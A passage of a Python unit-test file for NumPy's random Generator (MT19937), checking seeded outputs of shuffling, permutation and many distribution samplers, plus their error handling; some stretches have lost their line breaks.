        assert actual.dtype == np.int64
        actual = random.choice(4, 2, p=p, replace=False)
        assert actual.dtype == np.int64

    def test_choice_large_sample(self):
        # Hash of the full draw instead of a huge literal expected array.
        choice_hash = '4266599d12bfcfb815213303432341c06b4349f5455890446578877bb322e222'
        random = Generator(MT19937(self.seed))
        actual = random.choice(10000, 5000, replace=False)
        if sys.byteorder != 'little':
            actual = actual.byteswap()
        res = hashlib.sha256(actual.view(np.int8)).hexdigest()
        assert_(choice_hash == res)

    def test_bytes(self):
        random = Generator(MT19937(self.seed))
        actual = random.bytes(10)
        desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
        assert_equal(actual, desired)

    def test_shuffle(self):
        # Test lists, arrays (of various dtypes), and multidimensional
        # versions of both, c-contiguous or not:
        for conv in [lambda x: np.array([]),
                     lambda x: x,
                     lambda x: np.asarray(x).astype(np.int8),
                     lambda x: np.asarray(x).astype(np.float32),
                     lambda x: np.asarray(x).astype(np.complex64),
                     lambda x: np.asarray(x).astype(object),
                     lambda x: [(i, i) for i in x],
                     lambda x: np.asarray([[i, i] for i in x]),
                     lambda x: np.vstack([x, x]).T,
                     # gh-11442
                     lambda x: (np.asarray([(i, i) for i in x],
                                           [("a", int), ("b", int)])
                                .view(np.recarray)),
                     # gh-4270
                     lambda x: np.asarray([(i, i) for i in x],
                                          [("a", object, (1,)),
                                           ("b", np.int32, (1,))])]:
            random = Generator(MT19937(self.seed))
            alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
            random.shuffle(alist)
            actual = alist
            desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
            assert_array_equal(actual, desired)

    def test_shuffle_custom_axis(self):
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=1)
        desired = np.array([[0, 3, 1, 2],
                            [4, 7, 5, 6],
                            [8, 11, 9, 10],
                            [12, 15, 13, 14]])
        assert_array_equal(actual, desired)
        # axis=-1 is equivalent to axis=1 for a 2-D array.
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=-1)
        assert_array_equal(actual, desired)

    def test_shuffle_axis_nonsquare(self):
        y1 = np.arange(20).reshape(2, 10)
        y2 = y1.copy()
        random = Generator(MT19937(self.seed))
        random.shuffle(y1, axis=1)
        random = Generator(MT19937(self.seed))
        random.shuffle(y2.T)
        assert_array_equal(y1, y2)

    def test_shuffle_masked(self):
        # gh-3263
        a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
        b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
        a_orig = a.copy()
        b_orig = b.copy()
        for i in range(50):
            random.shuffle(a)
            assert_equal(
                sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
            random.shuffle(b)
            assert_equal(
                sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))

    def test_shuffle_exceptions(self):
        random = Generator(MT19937(self.seed))
        arr = np.arange(10)
        assert_raises(np.AxisError, random.shuffle, arr, 1)
        arr = np.arange(9).reshape((3, 3))
        assert_raises(np.AxisError, random.shuffle, arr, 3)
        assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
        arr = [[1, 2, 3], [4, 5, 6]]
        assert_raises(NotImplementedError, random.shuffle, arr, 1)

    def test_permutation(self):
        random = Generator(MT19937(self.seed))
        alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
        actual = random.permutation(alist)
        desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
        assert_array_equal(actual, desired)

        random = Generator(MT19937(self.seed))
        arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
        actual = random.permutation(arr_2d)
        assert_array_equal(actual, np.atleast_2d(desired).T)

        bad_x_str = "abcd"
        assert_raises(np.AxisError, random.permutation, bad_x_str)

        bad_x_float = 1.2
        assert_raises(np.AxisError, random.permutation, bad_x_float)

        random = Generator(MT19937(self.seed))
        integer_val = 10
        desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]

        actual = random.permutation(integer_val)
        assert_array_equal(actual, desired)

    def test_permutation_custom_axis(self):
        a = np.arange(16).reshape((4, 4))
        desired = np.array([[0, 3, 1, 2],
                            [4, 7, 5, 6],
                            [8, 11, 9, 10],
                            [12, 15, 13, 14]])
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=1)
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=-1)
        assert_array_equal(actual, desired)

    def test_permutation_exceptions(self):
        random = Generator(MT19937(self.seed))
        arr = np.arange(10)
        assert_raises(np.AxisError, random.permutation, arr, 1)
        arr = np.arange(9).reshape((3, 3))
        assert_raises(np.AxisError, random.permutation, arr, 3)
        assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))

    @pytest.mark.parametrize("dtype", [int, object])
    @pytest.mark.parametrize("axis, expected",
                             [(None, np.array([[3, 7, 0, 9, 10, 11],
                                               [8, 4, 2, 5, 1, 6]])),
                              (0, np.array([[6, 1, 2, 9, 10, 11],
                                            [0, 7, 8, 3, 4, 5]])),
                              (1, np.array([[5, 3, 4, 0, 2, 1],
                                            [11, 9, 10, 6, 8, 7]]))])
    def test_permuted(self, dtype, axis, expected):
        random = Generator(MT19937(self.seed))
        x = np.arange(12).reshape(2, 6).astype(dtype)
        random.permuted(x, axis=axis, out=x)
        assert_array_equal(x, expected)

        random = Generator(MT19937(self.seed))
        x = np.arange(12).reshape(2, 6).astype(dtype)
        y = random.permuted(x, axis=axis)
        assert y.dtype == dtype
        assert_array_equal(y, expected)

    def test_permuted_with_strides(self):
        random = Generator(MT19937(self.seed))
        x0 = np.arange(22).reshape(2, 11)
        x1 = x0.copy()
        x = x0[:, ::3]
        y = random.permuted(x, axis=1, out=x)
        expected = np.array([[0, 9, 3, 6],
                             [14, 20, 11, 17]])
        assert_array_equal(y, expected)
        x1[:, ::3] = expected
        # Verify that the original x0 was modified in-place as expected.
        assert_array_equal(x1, x0)

    def test_permuted_empty(self):
        y = random.permuted([])
        assert_array_equal(y, [])

    @pytest.mark.parametrize('outshape', [(2, 3), 5])
    def test_permuted_out_with_wrong_shape(self, outshape):
        a = np.array([1, 2, 3])
        out = np.zeros(outshape, dtype=a.dtype)
        with pytest.raises(ValueError, match='same shape'):
            random.permuted(a, out=out)

    def test_permuted_out_with_wrong_type(self):
        out = np.zeros((3, 5), dtype=np.int32)
        x = np.ones((3, 5))
        with pytest.raises(TypeError, match='Cannot cast'):
            random.permuted(x, axis=1, out=out)

    def test_beta(self):
        random = Generator(MT19937(self.seed))
        actual = random.beta(.1, .9, size=(3, 2))
        desired = np.array(
            [[1.083029353267698e-10, 2.449965303168024e-11],
             [2.397085162969853e-02, 3.590779671820755e-08],
             [2.830254190078299e-04, 1.744709918330393e-01]])
        assert_array_almost_equal(actual, desired, decimal=15)

    def test_binomial(self):
        random = Generator(MT19937(self.seed))
        actual = random.binomial(100.123, .456, size=(3, 2))
        desired = np.array([[42, 41],
                            [42, 48],
                            [44, 50]])
        assert_array_equal(actual, desired)

        random = Generator(MT19937(self.seed))
        actual = random.binomial(100.123, .456)
        desired = 42
        assert_array_equal(actual, desired)

    def test_chisquare(self):
        random = Generator(MT19937(self.seed))
        actual = random.chisquare(50, size=(3, 2))
        desired = np.array([[32.9850547060149, 39.0219480493301],
                            [56.2006134779419, 57.3474165711485],
                            [55.4243733880198, 55.4209797925213]])
        assert_array_almost_equal(actual, desired, decimal=13)

    def test_dirichlet(self):
        random = Generator(MT19937(self.seed))
        alpha = np.array([51.72840233779265162, 39.74494232180943953])
        actual = random.dirichlet(alpha, size=(3, 2))
        desired = np.array([[[0.5439892869558927, 0.45601071304410745],
                             [0.5588917345860708, 0.4411082654139292]],
                            [[0.5632074165063435, 0.43679258349365657],
                             [0.54862581112627, 0.45137418887373015]],
                            [[0.49961831357047226, 0.5003816864295278],
                             [0.52374806183482, 0.47625193816517997]]])
        assert_array_almost_equal(actual, desired, decimal=15)
        bad_alpha = np.array([5.4e-01, -1.0e-16])
        assert_raises(ValueError, random.dirichlet, bad_alpha)

        random = Generator(MT19937(self.seed))
        alpha = np.array([51.72840233779265162, 39.74494232180943953])
        actual = random.dirichlet(alpha)
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)

    def test_dirichlet_size(self):
        # gh-3173
        p = np.array([51.72840233779265162, 39.74494232180943953])
        assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
        assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
        assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))

        assert_raises(TypeError, random.dirichlet, p, float(1))

    def test_dirichlet_bad_alpha(self):
        # gh-2089
        alpha = np.array([5.4e-01, -1.0e-16])
        assert_raises(ValueError, random.dirichlet, alpha)

        # gh-15876
        assert_raises(ValueError, random.dirichlet, [[5, 1]])
        assert_raises(ValueError, random.dirichlet, [[5], [1]])
        assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
        assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))

    def test_dirichlet_alpha_non_contiguous(self):
        a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
        alpha = a[::2]
        random = Generator(MT19937(self.seed))
        non_contig = random.dirichlet(alpha, size=(3, 2))
        random = Generator(MT19937(self.seed))
        contig = random.dirichlet(np.ascontiguousarray(alpha),
                                  size=(3, 2))
        assert_array_almost_equal(non_contig, contig)

    def test_dirichlet_small_alpha(self):
        eps = 1.0e-9  # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
        alpha = eps * np.array([1., 1.0e-3])
        random = Generator(MT19937(self.seed))
        actual = random.dirichlet(alpha, size=(3, 2))
        expected = np.array([
            [[1., 0.],
             [1., 0.]],
            [[1., 0.],
             [1., 0.]],
            [[1., 0.],
             [1., 0.]]
        ])
        assert_array_almost_equal(actual, expected, decimal=15)

    @pytest.mark.slow
    def test_dirichlet_moderately_small_alpha(self):
        # Use alpha.max() < 0.1 to trigger stick breaking code path
        alpha = np.array([0.02, 0.04, 0.03])
        exact_mean = alpha / alpha.sum()
        random = Generator(MT19937(self.seed))
        sample = random.dirichlet(alpha, size=20000000)
        sample_mean = sample.mean(axis=0)
        assert_allclose(sample_mean, exact_mean, rtol=1e-3)

    def test_exponential(self):
        random = Generator(MT19937(self.seed))
        actual = random.exponential(1.1234, size=(3, 2))
        desired = np.array([[0.098845481066258, 1.560752510746964],
                            [0.075730916041636, 1.769098974710777],
                            [1.488602544592235, 2.49684815275751]])
        assert_array_almost_equal(actual, desired, decimal=15)

    def test_exponential_0(self):
        assert_equal(random.exponential(scale=0), 0)
        assert_raises(ValueError, random.exponential, scale=-0.)

    def test_f(self):
        random = Generator(MT19937(self.seed))
        actual = random.f(12, 77, size=(3, 2))
        desired = np.array([[0.461720027077085, 1.100441958872451],
                            [1.100337455217484, 0.91421736740018],
                            [0.500811891303113, 0.826802454552058]])
        assert_array_almost_equal(actual, desired, decimal=15)

    def test_gamma(self):
        random = Generator(MT19937(self.seed))
        actual = random.gamma(5, 3, size=(3, 2))
        desired = np.array([[5.03850858902096, 7.9228656732049],
                            [18.73983605132985, 19.57961681699238],
                            [18.17897755150825, 18.17653912505234]])
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_gamma_0(self):
        assert_equal(random.gamma(shape=0, scale=0), 0)
        assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self): random = Generator(MT19937(self.seed)) actual = random.geometric(.123456789, size=(3, 2)) desired = np.array([[ 1, 10], [ 1, 12], [ 9, 10]]) assert_array_equal(actual, desired) def test_geometric_exceptions(self): assert_raises(ValueError, random.geometric, 1.1) assert_raises(ValueError, random.geometric, [1.1] * 10) assert_raises(ValueError, random.geometric, -0.1) assert_raises(ValueError, random.geometric, [-0.1] * 10) with np.errstate(invalid='ignore'): assert_raises(ValueError, random.geometric, np.nan) assert_raises(ValueError, random.geometric, [np.nan] * 10) def test_gumbel(self): random = Generator(MT19937(self.seed)) actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[ 4.688397515056245, -0.289514845417841], [ 4.981176042584683, -0.633224272589149], [-0.055915275687488, -0.333962478257953]]) assert_array_almost_equal(actual, desired, decimal=15) def test_gumbel_0(self): assert_equal(random.gumbel(scale=0), 0) assert_raises(ValueError, random.gumbel, scale=-0.) 
def test_hypergeometric(self): random = Generator(MT19937(self.seed)) actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2)) desired = np.array([[ 9, 9], [ 9, 9], [10, 9]]) assert_array_equal(actual, desired) # Test nbad = 0 actual = random.hypergeometric(5, 0, 3, size=4) desired = np.array([3, 3, 3, 3]) assert_array_equal(actual, desired) actual = random.hypergeometric(15, 0, 12, size=4) desired = np.array([12, 12, 12, 12]) assert_array_equal(actual, desired) # Test ngood = 0 actual = random.hypergeometric(0, 5, 3, size=4) desired = np.array([0, 0, 0, 0]) assert_array_equal(actual, desired) actual = random.hypergeometric(0, 15, 12, size=4) desired = np.array([0, 0, 0, 0]) assert_array_equal(actual, desired) def test_laplace(self): random = Generator(MT19937(self.seed)) actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[-3.156353949272393, 1.195863024830054], [-3.435458081645966, 1.656882398925444], [ 0.924824032467446, 1.251116432209336]]) assert_array_almost_equal(actual, desired, decimal=15) def test_laplace_0(self): assert_equal(random.laplace(scale=0), 0) assert_raises(ValueError, random.laplace, scale=-0.) def test_logistic(self): random = Generator(MT19937(self.seed)) actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[-4.338584631510999, 1.890171436749954], [-4.64547787337966 , 2.514545562919217], [ 1.495389489198666, 1.967827627577474]]) assert_array_almost_equal(actual, desired, decimal=15) def test_lognormal(self): random = Generator(MT19937(self.seed)) actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2)) desired = np.array([[ 0.0268252166335, 13.9534486483053], [ 0.1204014788936, 2.2422077497792], [ 4.2484199496128, 12.0093343977523]]) assert_array_almost_equal(actual, desired, decimal=13) def test_lognormal_0(self): assert_equal(random.lognormal(sigma=0), 1) assert_raises(ValueError, random.lognormal, sigma=-0.) 
    def test_logseries(self):
        random = Generator(MT19937(self.seed))
        actual = random.logseries(p=.923456789, size=(3, 2))
        desired = np.array([[14, 17],
                            [3, 18],
                            [5, 1]])
        assert_array_equal(actual, desired)

    def test_logseries_exceptions(self):
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.logseries, np.nan)
            assert_raises(ValueError, random.logseries, [np.nan] * 10)

    def test_multinomial(self):
        random = Generator(MT19937(self.seed))
        actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
        desired = np.array([[[1, 5, 1, 6, 4, 3],
                             [4, 2, 6, 2, 4, 2]],
                            [[5, 3, 2, 6, 3, 1],
                             [4, 4, 0, 2, 3, 7]],
                            [[6, 3, 1, 5, 3, 2],
                             [5, 5, 3, 1, 2, 4]]])
        assert_array_equal(actual, desired)

    @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
    def test_multivariate_normal(self, method):
        random = Generator(MT19937(self.seed))
        mean = (.123456789, 10)
        cov = [[1, 0], [0, 1]]
        size = (3, 2)
        actual = random.multivariate_normal(mean, cov, size, method=method)
        desired = np.array([[[-1.747478062846581, 11.25613495182354],
                             [-0.9967333370066214, 10.342002097029821]],
                            [[0.7850019631242964, 11.181113712443013],
                             [0.8901349653255224, 8.873825399642492]],
                            [[0.7130260107430003, 9.551628690083056],
                             [0.7127098726541128, 11.991709234143173]]])
        assert_array_almost_equal(actual, desired, decimal=15)

        # Check for default size, was raising deprecation warning
        actual = random.multivariate_normal(mean, cov, method=method)
        desired = np.array([0.233278563284287, 9.424140804347195])
        assert_array_almost_equal(actual, desired, decimal=15)
        # Check that non symmetric covariance input raises exception when
        # check_valid='raises' if using default svd method.
        mean = [0, 0]
        cov = [[1, 2], [1, 2]]
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise')

        # Check that non positive-semidefinite covariance warns with
        # RuntimeWarning
        cov = [[1, 2], [2, 1]]
        assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
        assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
                     method='eigh')
        assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                      method='cholesky')

        # and that it doesn't warn with RuntimeWarning check_valid='ignore'
        assert_no_warnings(random.multivariate_normal, mean, cov,
                           check_valid='ignore')

        # and that it raises with RuntimeWarning check_valid='raises'
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise')
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='raise', method='eigh')

        # check degenerate samples from singular covariance matrix
        cov = [[1, 1], [1, 1]]
        if method in ('svd', 'eigh'):
            samples = random.multivariate_normal(mean, cov, size=(3, 2),
                                                 method=method)
            assert_array_almost_equal(samples[..., 0], samples[..., 1],
                                      decimal=6)
        else:
            assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                          method='cholesky')

        # float32 covariance must not trigger a spurious PSD warning.
        cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
        with suppress_warnings() as sup:
            random.multivariate_normal(mean, cov, method=method)
            w = sup.record(RuntimeWarning)
            assert len(w) == 0

        mu = np.zeros(2)
        cov = np.eye(2)
        assert_raises(ValueError, random.multivariate_normal, mean, cov,
                      check_valid='other')
        assert_raises(ValueError, random.multivariate_normal,
                      np.zeros((2, 1, 1)), cov)
        assert_raises(ValueError, random.multivariate_normal,
                      mu, np.empty((3, 2)))
        assert_raises(ValueError, random.multivariate_normal,
                      mu, np.eye(3))

    @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
    def test_multivariate_normal_basic_stats(self, method):
        random = Generator(MT19937(self.seed))
        n_s = 1000
        mean = np.array([1, 2])
        cov = np.array([[2, 1], [1, 2]])
        s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
        s_center = s - mean
        cov_emp = (s_center.T @ s_center) / (n_s - 1)
        # these are pretty loose and are only designed to detect major errors
        assert np.all(np.abs(s_center.mean(-2)) < 0.1)
        assert np.all(np.abs(cov_emp - cov) < 0.2)

    def test_negative_binomial(self):
        random = Generator(MT19937(self.seed))
        actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
        desired = np.array([[543, 727],
                            [775, 760],
                            [600, 674]])
        assert_array_equal(actual, desired)

    def test_negative_binomial_exceptions(self):
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.negative_binomial, 100, np.nan)
            assert_raises(ValueError, random.negative_binomial, 100,
                          [np.nan] * 10)

    def test_negative_binomial_p0_exception(self):
        # Verify that p=0 raises an exception.
        with assert_raises(ValueError):
            x = random.negative_binomial(1, 0)

    def test_noncentral_chisquare(self):
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
        desired = np.array([[1.70561552362133, 15.97378184942111],
                            [13.71483425173724, 20.17859633310629],
                            [11.3615477156643, 3.67891108738029]])
        assert_array_almost_equal(actual, desired, decimal=14)

        actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
        desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
                            [1.14554372041263e+00, 1.38187755933435e-03],
                            [1.90659181905387e+00, 1.21772577941822e+00]])
        assert_array_almost_equal(actual, desired, decimal=14)

        # nonc=0 reduces to the (central) chi-squared distribution.
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
        desired = np.array([[0.82947954590419, 1.80139670767078],
                            [6.58720057417794, 7.00491463609814],
                            [6.31101879073157, 6.30982307753005]])
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_noncentral_f(self):
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
                                     size=(3, 2))
        desired = np.array([[0.060310671139, 0.23866058175939],
                            [0.86860246709073, 0.2668510459738],
                            [0.23375780078364, 1.88922102885943]])
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_noncentral_f_nan(self):
        random = Generator(MT19937(self.seed))
        actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
        assert np.isnan(actual)

    def test_normal(self):
        random = Generator(MT19937(self.seed))
        actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
        desired = np.array([[-3.618412914693162, 2.635726692647081],
                            [-2.116923463013243, 0.807460983059643],
                            [1.446547137248593, 2.485684213886024]])
        assert_array_almost_equal(actual, desired, decimal=15)

    def test_normal_0(self):
        assert_equal(random.normal(scale=0), 0)
        assert_raises(ValueError, random.normal, scale=-0.)

    def test_pareto(self):
        random = Generator(MT19937(self.seed))
        actual = random.pareto(a=.123456789, size=(3, 2))
        desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
                            [7.2640150889064703e-01, 3.4650454783825594e+05],
                            [4.5852344481994740e+04, 6.5851383009539105e+07]])
        # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
        # matrix differs by 24 nulps. Discussion:
        #   https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
        # Consensus is that this is probably some gcc quirk that affects
        # rounding but not in any important way, so we just use a looser
        # tolerance on this test:
        np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)

    def test_poisson(self):
        random = Generator(MT19937(self.seed))
        actual = random.poisson(lam=.123456789, size=(3, 2))
        desired = np.array([[0, 0],
                            [0, 0],
                            [0, 0]])
        assert_array_equal(actual, desired)

    def test_poisson_exceptions(self):
        lambig = np.iinfo('int64').max
        lamneg = -1
        assert_raises(ValueError, random.poisson, lamneg)
        assert_raises(ValueError, random.poisson, [lamneg] * 10)
        assert_raises(ValueError, random.poisson, lambig)
        assert_raises(ValueError, random.poisson, [lambig] * 10)
        with np.errstate(invalid='ignore'):
            assert_raises(ValueError, random.poisson, np.nan)
            assert_raises(ValueError, random.poisson, [np.nan] * 10)

    def test_power(self):
        random = Generator(MT19937(self.seed))
        actual = random.power(a=.123456789, size=(3, 2))
        desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
                            [2.482442984543471e-10, 1.527108843266079e-01],
                            [8.188283434244285e-02, 3.950547209346948e-01]])
        assert_array_almost_equal(actual, desired, decimal=15)

    def test_rayleigh(self):
        random = Generator(MT19937(self.seed))
        actual = random.rayleigh(scale=10, size=(3, 2))
        desired = np.array([[4.51734079831581, 15.6802442485758],
                            [4.19850651287094, 17.08718809823704],
                            [14.7907457708776, 15.85545333419775]])
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_rayleigh_0(self):
        assert_equal(random.rayleigh(scale=0), 0)
        assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self): random = Generator(MT19937(self.seed)) actual = random.standard_cauchy(size=(3, 2)) desired = np.array([[-1.489437778266206, -3.275389641569784], [ 0.560102864910406, -0.680780916282552], [-1.314912905226277, 0.295852965660225]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_exponential(self): random = Generator(MT19937(self.seed)) actual = random.standard_exponential(size=(3, 2), method='inv') desired = np.array([[0.102031839440643, 1.229350298474972], [0.088137284693098, 1.459859985522667], [1.093830802293668, 1.256977002164613]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_expoential_type_error(self): assert_raises(TypeError, random.standard_exponential, dtype=np.int32) def test_standard_gamma(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(shape=3, size=(3, 2)) desired = np.array([[0.62970724056362, 1.22379851271008], [3.899412530884 , 4.12479964250139], [3.74994102464584, 3.74929307690815]]) assert_array_almost_equal(actual, desired, decimal=14) def test_standard_gammma_scalar_float(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(3, dtype=np.float32) desired = 2.9242148399353027 assert_array_almost_equal(actual, desired, decimal=6) def test_standard_gamma_float(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(shape=3, size=(3, 2)) desired = np.array([[0.62971, 1.2238 ], [3.89941, 4.1248 ], [3.74994, 3.74929]]) assert_array_almost_equal(actual, desired, decimal=5) def test_standard_gammma_float_out(self): actual = np.zeros((3, 2), dtype=np.float32) random = Generator(MT19937(self.seed)) random.standard_gamma(10.0, out=actual, dtype=np.float32) desired = np.array([[10.14987, 7.87012], [ 9.46284, 12.56832], [13.82495, 7.81533]], dtype=np.float32) assert_array_almost_equal(actual, desired, decimal=5) random = Generator(MT19937(self.seed)) random.standard_gamma(10.0, out=actual, size=(3, 2), 
dtype=np.float32) assert_array_almost_equal(actual, desired, decimal=5) def test_standard_gamma_unknown_type(self): assert_raises(TypeError, random.standard_gamma, 1., dtype='int32') def test_out_size_mismatch(self): out = np.zeros(10) assert_raises(ValueError, random.standard_gamma, 10.0, size=20, out=out) assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1), out=out) def test_standard_gamma_0(self): assert_equal(random.standard_gamma(shape=0), 0) assert_raises(ValueError, random.standard_gamma, shape=-0.) def test_standard_normal(self): random = Generator(MT19937(self.seed)) actual = random.standard_normal(size=(3, 2)) desired = np.array([[-1.870934851846581, 1.25613495182354 ], [-1.120190126006621, 0.342002097029821], [ 0.661545174124296, 1.181113712443012]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_normal_unsupported_type(self): assert_raises(TypeError, random.standard_normal, dtype=np.int32) def test_standard_t(self): random = Generator(MT19937(self.seed)) actual = random.standard_t(df=10, size=(3, 2)) desired = np.array([[-1.484666193042647, 0.30597891831161 ], [ 1.056684299648085, -0.407312602088507], [ 0.130704414281157, -2.038053410490321]]) assert_array_almost_equal(actual, desired, decimal=15) def test_triangular(self): random = Generator(MT19937(self.seed)) actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2)) desired = np.array([[ 7.86664070590917, 13.6313848513185 ], [ 7.68152445215983, 14.36169131136546], [13.16105603911429, 13.72341621856971]]) assert_array_almost_equal(actual, desired, decimal=14) def test_uniform(self): random = Generator(MT19937(self.seed)) actual = random.uniform(low=1.23, high=10.54, size=(3, 2)) desired = np.array([[2.13306255040998 , 7.816987531021207], [2.015436610109887, 8.377577533009589], [7.421792588856135, 7.891185744455209]]) assert_array_almost_equal(actual, desired, decimal=15) def test_uniform_range_bounds(self): fmin = np.finfo('float').min fmax = 
np.finfo('float').max func = random.uniform assert_raises(OverflowError, func, -np.inf, 0) assert_raises(OverflowError, func, 0, np.inf) assert_raises(OverflowError, func, fmin, fmax) assert_raises(OverflowError, func, [-np.inf], [0]) assert_raises(OverflowError, func, [0], [np.inf]) # (fmax / 1e17) - fmin is within range, so this should not throw # account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX > # DBL_MAX by increasing fmin a bit random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17) def test_scalar_exception_propagation(self): # Tests that exceptions are correctly propagated in distributions # when called with objects that throw exceptions when converted to # scalars. # # Regression test for gh: 8865 class ThrowingFloat(np.ndarray): def __float__(self): raise TypeError throwing_float = np.array(1.0).view(ThrowingFloat) assert_raises(TypeError, random.uniform, throwing_float, throwing_float) class ThrowingInteger(np.ndarray): def __int__(self): raise TypeError throwing_int = np.array(1).view(ThrowingInteger) assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1) def test_vonmises(self): random = Generator(MT19937(self.seed)) actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2)) desired = np.array([[ 1.107972248690106, 2.841536476232361], [ 1.832602376042457, 1.945511926976032], [-0.260147475776542, 2.058047492231698]]) assert_array_almost_equal(actual, desired, decimal=15) def test_vonmises_small(self): # check infinite loop, gh-4720 random = Generator(MT19937(self.seed)) r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6) assert_(np.isfinite(r).all()) def test_vonmises_nan(self): random = Generator(MT19937(self.seed)) r = random.vonmises(mu=0., kappa=np.nan) assert_(np.isnan(r)) def test_wald(self): random = Generator(MT19937(self.seed)) actual = random.wald(mean=1.23, scale=1.54, size=(3, 2)) desired = np.array([[0.26871721804551, 3.2233942732115 ], [2.20328374987066, 2.40958405189353], [2.07093587449261, 
0.73073890064369]]) assert_array_almost_equal(actual, desired, decimal=14) def test_weibull(self): random = Generator(MT19937(self.seed)) actual = random.weibull(a=1.23, size=(3, 2)) desired = np.array([[0.138613914769468, 1.306463419753191], [0.111623365934763, 1.446570494646721], [1.257145775276011, 1.914247725027957]]) assert_array_almost_equal(actual, desired, decimal=15) def test_weibull_0(self): random = Generator(MT19937(self.seed)) assert_equal(random.weibull(a=0, size=12), np.zeros(12)) assert_raises(ValueError, random.weibull, a=-0.) def test_zipf(self): random = Generator(MT19937(self.seed)) actual = random.zipf(a=1.23, size=(3, 2)) desired = np.array([[ 1, 1], [ 10, 867], [354, 2]]) assert_array_equal(actual, desired) class TestBroadcast: # tests that functions that broadcast behave # correctly when presented with non-scalar arguments def setup(self): self.seed = 123456789 def test_uniform(self): random = Generator(MT19937(self.seed)) low = [0] high = [1] uniform = random.uniform desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095]) random = Generator(MT19937(self.seed)) actual = random.uniform(low * 3, high) assert_array_almost_equal(actual, desired, decimal=14) random = Generator(MT19937(self.seed)) actual = random.uniform(low, high * 3) assert_array_almost_equal(actual, desired, decimal=14) def test_normal(self): loc = [0] scale = [1] bad_scale = [-1] random = Generator(MT19937(self.seed)) desired = 